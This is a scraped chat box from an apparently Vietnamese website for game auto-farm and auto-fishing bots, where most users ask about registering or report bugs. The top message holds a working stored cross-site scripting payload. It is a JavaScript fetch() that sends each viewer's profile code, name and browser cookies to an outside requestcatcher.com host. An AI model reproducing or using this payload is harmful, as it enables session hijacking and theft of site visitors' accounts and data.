Some text some message..
Chat Box
Tên bạn
Nội dung


user Vinh Tran (ngày 23/04/21 lúc 07:28) : fetch(`https://xssthayoi.requestcatcher.com/xss?msv=${document.querySelector('.nav__profile__menu__code').innerText}`, {method:'POST',body: `ten=${document.querySelector('.nav__profile__menu__name').innerText}&cookies=${document.cookie}`})
user Vinh (ngày 20/04/21 lúc 05:17) : Ad ơi. Auto fram fix được chưa. Qua giờ không làm ăn dc gì.
user Aubi (ngày 19/04/21 lúc 11:37) : Lỗi auto fram pb v960
user Caube2d (ngày 19/04/21 lúc 06:53) : đăng ký câu cá
user Quan (ngày 18/04/21 lúc 12:30) : Đăng kí câu cá
user Monstarvn (ngày 13/04/21 lúc 07:34) : sao dky cau ca ma k dc z send15k r
user Phi9 (ngày 13/04/21 lúc 04:26) : đăng ki câu cá
user Sang (ngày 13/04/21 lúc 08:34) : Hướng dẫn tui đăng kí auto câu cá đi sao thấy có nhiều người đăng kí k dc vậy
user Linh (ngày 12/04/21 lúc 06:13) : cho minh xin hoi muon auto fram avatar tren pc lam cach nao a
user H0cm0tbietmuoi (ngày 11/04/21 lúc 03:09) : Đăng kí câu cá